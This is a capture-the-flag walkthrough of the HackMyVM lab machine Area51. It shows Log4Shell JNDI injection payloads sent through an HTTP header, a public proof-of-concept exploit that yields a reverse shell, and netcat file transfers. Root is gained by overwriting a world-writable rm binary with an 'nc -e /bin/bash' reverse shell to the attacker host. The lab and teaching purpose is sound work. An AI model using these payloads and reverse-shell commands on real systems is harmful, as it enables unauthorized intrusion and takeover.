Area51 – Writeup – Log4Shell – HackMyVM

Area51 is an easy machine built on the recent 0-day vulnerability of the Log4j utility. This is one of the vulnerabilities that had a lot of impacts worldwide and affected many enterprises. I also like to extend a huge thanks to the author bitc0de for this. The machine is fairly simple once we get the foothold. So, let’s start the writeup. “Area51 – Writeup – Log4Shell – HackMyVM”

Link to the machine: https://hackmyvm.eu/machines/machine.php?vm=Area51

Step 1: Get the IP address

As usual, I began enumeration by identifying the IP address of the target machine.

┌──(kali㉿kali)-[~/hackmyvm/area51]
└─$ fping -aqg 10.0.0.0/24
10.0.0.1
10.0.0.2
10.0.0.3
10.0.0.4
10.0.0.5

Here, the IP address of my Kali machine is 10.0.0.4 and that of the target is 10.0.0.5. (The IP has reset from the beginning because I recently switched to my Fedora 35 and created a new NAT network on VirtualBox. Please, leave a comment if you are a fan of Fedora)

Step 2: Scan ports using nmap

Next, I checked the open ports on the target that we can access from the network.

┌──(kali㉿kali)-[~/hackmyvm/area51]
└─$ nmap -T4 -sC -sV -p- -oN nmap.log 10.0.0.5
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-01 19:28 +0545
Nmap scan report for 10.0.0.5
Host is up (0.00087s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   3072 de:bf:2a:93:86:b8:b3:a3:13:5b:46:66:34:d6:dc:b1 (RSA)
|   256 a9:df:bb:71:90:6c:d1:2f:e7:48:97:2e:ad:7b:15:d3 (ECDSA)
|_  256 78:75:83:1c:03:03:a1:92:4f:73:8e:f2:2d:23:d2:0e (ED25519)
80/tcp   open  http        Apache httpd 2.4.51 ((Debian))
|_http-title: FBI Access
|_http-server-header: Apache/2.4.51 (Debian)
8080/tcp open  nagios-nsca Nagios NSCA
|_http-title: Site doesn't have a title (application/json).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

As we can see above, there are two HTTP ports. The one on 80 is Apache whereas that of 8080 is Spring Application. We can identify this from the text “Whitelabel error page”.

Step 3: Directory busting using gobuster

The website is pretty static. Thus, I perform directory busting on port 80.

┌──(kali㉿kali)-[~/hackmyvm/area51]
└─$ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.0.0.5 -x php,html,txt -o medium.log
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.0.0.5
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php,html,txt
[+] Timeout:                 10s
===============================================================
2022/01/01 19:30:25 Starting gobuster in directory enumeration mode
===============================================================
/video                (Status: 301) [Size: 304] [--> http://10.0.0.5/video/]
/index.html           (Status: 200) [Size: 1131]                            
/radar                (Status: 301) [Size: 304] [--> http://10.0.0.5/radar/]
/note.txt             (Status: 200) [Size: 119]                             
/moon                 (Status: 301) [Size: 303] [--> http://10.0.0.5/moon/]

We have a note.txt that gives the information about the log4j exploit.

┌──(kali㉿kali)-[~/hackmyvm/area51]
└─$ curl http://10.0.0.5/note.txt                                                   
Alert!
We have a vulnerability in our java application...
Notify the programming department to check Log4J.

-Admin

Step 4: Check Java Application on port 8080

Firstly, I was testing only on the “User-Agent” header for the exploit. However, it actually existed on the header “X-Api-Version”. I got this information from the website https://log4j-tester.trendmicro.com/. There are other tools that help us test for the exploit such as https://log4shell.tools.

Anyways, I also tested it on my own machine too. For this, I listened on port 9001.

┌──(kali㉿kali)-[~/hackmyvm/area51]
└─$ nc -nlvp 9001                             
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001

Then, I sent the payload as follows.

┌──(kali㉿kali)-[~/hackmyvm/area51]
└─$ curl http://10.0.0.5:8080 -H 'X-Api-Version: ${jndi:ldap://10.0.0.4:9001/nepcodex}'

I got a connection.

┌──(kali㉿kali)-[~/hackmyvm/area51]
└─$ nc -nlvp 9001                             
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.0.0.5.
Ncat: Connection from 10.0.0.5:60098.
0
 `�

This means that the application is really vulnerable to the Log4j exploit. For the exploit part, I tried to use JNDI Exploit Kit and ysoserialize modified. However, I wasn’t successful. If you guys were able to get the shell, please leave how you did in the comment.

Nevertheless, another original exploit POC worked.

┌──(kali㉿kali)-[~/hackmyvm/area51]
└─$ git clone https://github.com/kozmer/log4j-shell-poc.git

We have to follow the README properly. It says that we have to download a particular JDK version. The repo owner has pasted the link on the README file. I copied the JDK on the directory of the exploit.

┌──(kali㉿kali)-[~/hackmyvm/area51/log4j-shell-poc]
└─$ python3 poc.py --userip 10.0.0.4

[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/kozmer/log4j-shell-poc

Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
[+] Exploit java class created success
[+] Setting up LDAP server

[+] Send me: ${jndi:ldap://10.0.0.4:1389/a}
[+] Starting Webserver on port 8000 http://0.0.0.0:8000

Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Listening on 0.0.0.0:1389

Here, we can see that an LDAP service is open on port 1389.

┌──(kali㉿kali)-[~/hackmyvm/area51/log4j-shell-poc]
└─$ curl 'http://10.0.0.5:8080' -H 'X-Api-Version: ${jndi:ldap://10.0.0.4:1389/a}'

This gives us a reverse shell which is a docker container. Furthermore, it is an alpine image. So, we don’t have enough binaries to get us the proper shell.

Step 5: Get the password for the user roger

With the reverse shell, I carefully used linpeas.sh to identify a file that has the password.

On the local machine, I would use netcat to push the file.

┌──(kali㉿kali)-[~/hackmyvm/area51]
└─$ nc -nlvp 9001 < ~/linpeas.sh
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001

Then, I used netcat on the target to put the file in the /tmp directory.

nc 10.0.0.4 9001 > /tmp/linpeas.sh
cd /tmp
chmod +x linpeas.sh
./linpeas.sh | tee linpeas.out | more

In the output, I saw the file that has the password.

╔══════════╣ All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)
-rw-r--r--    1 root     root            10 Dec 19 19:19 /var/tmp/.roger

Step 6: Get the password of kang

I logged in to the user roger using SSH.

┌──(kali㉿kali)-[~/hackmyvm/area51]
└─$ ssh roger@10.0.0.5
roger@10.0.0.5's password: 
Linux area51 5.10.0-10-amd64 #1 SMP Debian 5.10.84-1 (2021-12-08) x86_64

# SNIP
Last login: Tue Dec 21 08:03:09 2021 from 192.168.1.43
Your input:
^Croger@area51:~$ ls
shoppingList  SubjectDescription  user.txt
roger@area51:~$ id
uid=1001(roger) gid=1001(roger) groups=1001(roger)

To remove the “Your input:” prompt, I simply used the Ctrl+C keystroke combination. Then, I transferred linpeas.sh and pspy64 using a Python webserver. I won’t be explaining this step. The linpeas.sh also gave me a file that contained the password for the user kang.

╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files
/dev/mqueue
/dev/shm
/etc/pam.d/kang

In addition to this information, we can also see that the binary “/usr/bin/rm” is writable by everyone.

#)You_can_write_even_more_files_inside_last_directory

/usr/bin/rm

This piece of information is important once we switch to the user kang.

Step 7: Get the root shell

After I got the shell of kang, I checked the processes using pspy64.

2022/01/01 09:18:17 CMD: UID=0    PID=21123  | sh /kang/weComeInPeace.sh 
2022/01/01 09:18:17 CMD: UID=0    PID=21124  | sleep 1 
2022/01/01 09:18:18 CMD: UID=0    PID=21126  | sleep 2 
2022/01/01 09:18:20 CMD: UID=0    PID=21128  | sleep 1 
2022/01/01 09:18:21 CMD: UID=0    PID=21130  | sleep 2 
2022/01/01 09:18:23 CMD: UID=0    PID=21132  | sleep 1 
2022/01/01 09:18:24 CMD: UID=0    PID=21134  | sleep 2 
2022/01/01 09:18:26 CMD: UID=0    PID=21136  | sleep 1

Here, some “sleep” commands are issued after the “weComeInPeace.sh” script on the home directory of kang is run. So, when I checked the home directory, I found that the file is created and removed regularly.

kang@area51:~$ ls -al
total 12
drwxrwx---  3 kang kang 4096 Jan  1 09:19 .
drwxr-xr-x 19 root root 4096 Dec 19 15:49 ..
lrwxrwxrwx  1 root root    9 Dec 19 18:16 .bash_history -> /dev/null
drwxr-xr-x  3 kang kang 4096 Dec 21 07:43 .local

Thus, I got a feeling that we can rewrite the binary “rm” to get our own shell as it is writable by everyone. For this, I will once again spawn a reverse shell on port 9001. So, as you guessed, I am already listening on port 9001.

kang@area51:~$ echo 'nc -e /bin/bash 10.0.0.4 9001' > /usr/bin/rm

After some time, I got the shell.

┌──(kali㉿kali)-[~]
└─$ nc -nlvp 9001                
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.0.0.5.
Ncat: Connection from 10.0.0.5:35926.
id
uid=0(root) gid=0(root) groups=0(root)
python3 -c 'import pty;pty.spawn("/bin/bash")'
root@area51:/# echo nepcodex.com
echo nepcodex.com
nepcodex.com
root@area51:/#

If you want to upgrade the shell, check the following guide.

Upgrade to an intelligent reverse shell

Also read: Warez Walkthrough – HackMyVM – Writeup